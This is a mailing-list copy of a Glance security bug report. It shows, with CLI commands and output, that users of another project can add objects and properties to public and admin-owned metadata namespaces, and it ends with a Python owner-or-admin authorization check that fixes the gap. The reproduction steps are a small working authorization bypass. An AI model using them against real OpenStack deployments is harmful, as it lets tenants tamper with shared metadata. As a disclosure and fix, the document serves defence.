yahoo-eng-team team mailing list archive
Message #46292
[Bug 1545732] [NEW] glance v2 api: standard user can update other user's public metadefs
*** This bug is a security vulnerability ***
Private security bug reported:
If project 'd12bddf60e4649b2a2cf6a2cc7520d79' owns a global namespace:
$ openstack token issue
+------------+----------------------------------+
| Field      | Value                            |
+------------+----------------------------------+
| expires    | 2016-02-15T14:23:21Z             |
| id         | 7b8b9c6347f54d4ca5f543704068a0bb |
| project_id | d12bddf60e4649b2a2cf6a2cc7520d79 |
| user_id    | e543889c522c46018c6a8f3ff71c1859 |
+------------+----------------------------------+
$ glance md-namespace-show NS1001
+------------+----------------------------------+
| Property   | Value                            |
+------------+----------------------------------+
| created_at | 2016-02-15T12:56:09Z             |
| namespace  | NS1001                           |
| objects    | ["ob1"]                          |
| owner      | d12bddf60e4649b2a2cf6a2cc7520d79 |
| protected  | False                            |
| schema     | /v2/schemas/metadefs/namespace   |
| updated_at | 2016-02-15T12:56:09Z             |
| visibility | public                           |
+------------+----------------------------------+
Another project can update that namespace (eg with a new object):
$ openstack token issue
+------------+----------------------------------+
| Field      | Value                            |
+------------+----------------------------------+
| expires    | 2016-02-15T14:25:09.152643Z      |
| id         | 0df5acec2b884f3c8cff744b4c4f66d0 |
| project_id | c4f1b829b3af4775abdc9d70059eac10 | <<<
| user_id    | 10f27b7f965a47f98a828e4b342c03fd |
+------------+----------------------------------+
$ glance md-object-create --name objectx --schema {} NS1001
+------------+-----------------------------+
| Property   | Value                       |
+------------+-----------------------------+
| created_at | 2016-02-15T13:25:33Z        |
| name       | objectx                     |
| schema     | /v2/schemas/metadefs/object |
| updated_at | 2016-02-15T13:25:33Z        |
+------------+-----------------------------+
This seems to also be possible if the namespace is owned by 'admin':
<as regular user, add an object to an admin owned namespace>
$ glance md-object-create --name objectx --schema {} OS::Compute::GuestMemoryBacking
+------------+-----------------------------+
| Property   | Value                       |
+------------+-----------------------------+
| created_at | 2016-02-15T13:28:11Z        |
| name       | objectx                     |
| schema     | /v2/schemas/metadefs/object |
| updated_at | 2016-02-15T13:28:11Z        |
+------------+-----------------------------+
$ glance md-namespace-show OS::Compute::GuestMemoryBacking
+----------------------------+----------------------------------------------------------------------------------+
| Property                   | Value                                                                            |
+----------------------------+----------------------------------------------------------------------------------+
| created_at                 | 2016-02-08T13:37:48Z                                                             |
| description                | This provides the preferred backing option for guest RAM. Guest's memory can be  |
|                            | backed by hugepages to limit TLB lookups. See also:                              |
|                            | https://wiki.openstack.org/wiki/VirtDriverGuestCPUMemoryPlacement                |
| display_name               | Guest Memory Backing                                                             |
| namespace                  | OS::Compute::GuestMemoryBacking                                                  |
| objects                    | ["objectx"]                                                                      |
| owner                      | admin                                                                            |
| properties                 | ["mem_page_size"]                                                                |
| protected                  | True                                                                             |
| resource_type_associations | ["OS::Glance::Image", "OS::Cinder::Volume", "OS::Nova::Flavor"]                  |
| schema                     | /v2/schemas/metadefs/namespace                                                   |
| visibility                 | public                                                                           |
+----------------------------+----------------------------------------------------------------------------------+
<as regular user, add a property to an admin owned namespace>
$ glance md-property-create --name propx --title title1 --schema '{"description": "x", "type":"string"}' OS::Compute::GuestMemoryBacking
+-------------+--------+
| Property    | Value  |
+-------------+--------+
| description | x      |
| name        | propx  |
| title       | title1 |
| type        | string |
+-------------+--------+
In contrast, updating a private namespace is forbidden:
$ glance md-object-create --name objectx --schema {} NS1003
403 Forbidden: Forbidding request, metadata definition namespace=NS1003 is not visible. (HTTP 403)
I'm assuming that public namespaces are intended to be public in a read-only sense (like images).
** Affects: glance
Importance: Undecided
Status: New
** Information type changed from Public to Private Security
--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Glance.
https://bugs.launchpad.net/bugs/1545732
To manage notifications about this bug go to:
https://bugs.launchpad.net/glance/+bug/1545732/+subscriptions
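The owner-or-admin write rule that the report above shows to be missing, as an added example written for this page (not Glance's own code): namespace visibility gates reads, ownership gates writes, and the report's own namespaces and project ids are replayed against it. The owner of NS1003 and the admin project id are assumptions.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Namespace:
    name: str
    owner: str        # owning project id, or 'admin' for the bundled namespaces
    visibility: str   # 'public' or 'private'

@dataclass(frozen=True)
class RequestContext:
    project_id: str
    is_admin: bool = False

def can_read(ns: Namespace, ctx: RequestContext) -> bool:
    # Public namespaces are readable by anyone; private ones only by their
    # owner or an admin (the behaviour behind the report's 403 on NS1003).
    return ns.visibility == "public" or ctx.is_admin or ns.owner == ctx.project_id

def can_modify(ns: Namespace, ctx: RequestContext) -> bool:
    # Writes (new objects/properties, namespace updates) are owner-or-admin
    # only, whatever the visibility: this is the check the report found missing.
    return ctx.is_admin or ns.owner == ctx.project_id

def authorize(ns: Namespace, ctx: RequestContext, action: str) -> tuple:
    """Return (allowed, reason). Visibility is tested before ownership so a
    non-owner learns nothing about a private namespace beyond 'not visible'."""
    if not can_read(ns, ctx):
        return False, "metadata definition namespace=%s is not visible" % ns.name
    if action != "read" and not can_modify(ns, ctx):
        return False, "metadata definition namespace=%s is not owned by caller" % ns.name
    return True, ""

# Values quoted in the report; NS1003's owner and the admin project are assumed.
NS1001 = Namespace("NS1001", "d12bddf60e4649b2a2cf6a2cc7520d79", "public")
NS1003 = Namespace("NS1003", "d12bddf60e4649b2a2cf6a2cc7520d79", "private")
GUEST_MEM = Namespace("OS::Compute::GuestMemoryBacking", "admin", "public")
OWNER = RequestContext("d12bddf60e4649b2a2cf6a2cc7520d79")
OTHER = RequestContext("c4f1b829b3af4775abdc9d70059eac10")
ADMIN = RequestContext("admin-project-id-assumed", is_admin=True)

def check_report_cases() -> dict:
    """Replay the report's requests against the hardened rule."""
    return {
        "other reads NS1001": authorize(NS1001, OTHER, "read")[0],
        "other adds object to NS1001": authorize(NS1001, OTHER, "add_object")[0],
        "owner adds object to NS1001": authorize(NS1001, OWNER, "add_object")[0],
        "other adds property to admin ns": authorize(GUEST_MEM, OTHER, "add_property")[0],
        "other adds object to NS1003": authorize(NS1003, OTHER, "add_object"),
        "admin adds object to NS1001": authorize(NS1001, ADMIN, "add_object")[0],
    }
```

With this rule the two cross-project writes and the write to the admin-owned namespace are refused, while reads of public namespaces and the private-namespace 403 behave as the report observed.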